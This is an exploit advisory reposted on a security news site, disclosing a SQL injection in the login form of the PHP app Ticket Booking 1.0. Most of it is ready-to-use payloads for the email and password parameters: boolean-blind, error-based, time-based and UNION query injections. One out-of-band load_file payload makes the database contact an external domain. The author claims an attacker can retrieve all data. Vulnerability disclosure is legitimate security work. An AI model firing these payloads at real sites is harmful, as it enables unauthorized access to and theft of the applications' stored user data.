Home Tools Exploits & CVE's Ticket Booking 1.0 SQL Injection

Ticket Booking 1.0 SQL Injection

December 14, 2021

945

Ticket Booking version 1.0 suffers from a remote SQL injection vulnerability.

## Title: Ticket Booking 1.0 suffer from SQL - Injenction
## Author: nu11secur1ty
## Date: 12.14.2021
## Vendor: https://code-projects.org/ticket-booking-in-php-with-source-code/
## Software: https://code-projects.org/ticket-booking-in-php-with-source-code/

## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\dl2edbuqvk9djxngyslxk9z7hynrbqzh25uslga.nu11secur1tyPenetrationTestingEngineer.netyba'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. The attacker can be retrieving all
information from this system.

[+] Payload:

Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: email=-9424' OR 1979=1979#&password=hacked' or
'4861'='4870&login_submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: [email protected]'
OR (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT
(ELT(3647=3647,1))),0x71716a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RnIV&password=hacked' or
'4861'='4870&login_submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'
AND (SELECT 2804 FROM (SELECT(SLEEP(5)))urgo)-- taiV&password=hacked'
or '4861'='4870&login_submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: [email protected]'
UNION ALL SELECT
NULL,CONCAT(0x717a6b7a71,0x5379666f7a4b7256695768444c63617a724465514467724f4c59744a4d574a6d4c697974424d4c47,0x71716a7a71),NULL,NULL,NULL,NULL,NULL#&password=hacked'
or '4861'='4870&login_submit=

## Reproduce:
[href]()

## Proof and Exploit:
[href](https://streamable.com/vtr95i)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Ticket Booking 1.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Ex-FSB officer sentenced to 9 years in prison for helping Russian...

Phishing-as-a-service platform LabHost shut down in global operation

NATO to launch new cyber center to contest cyberspace ‘at all...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Easy Web Portal 2.1.1 Cross Site Scripting

Backdoor.Win32.Whirlpool.10 Remote Stack Buffer Overflow

Kiddoware Kids Place Parental Control Android App 3.8.49 XSS / CSRF...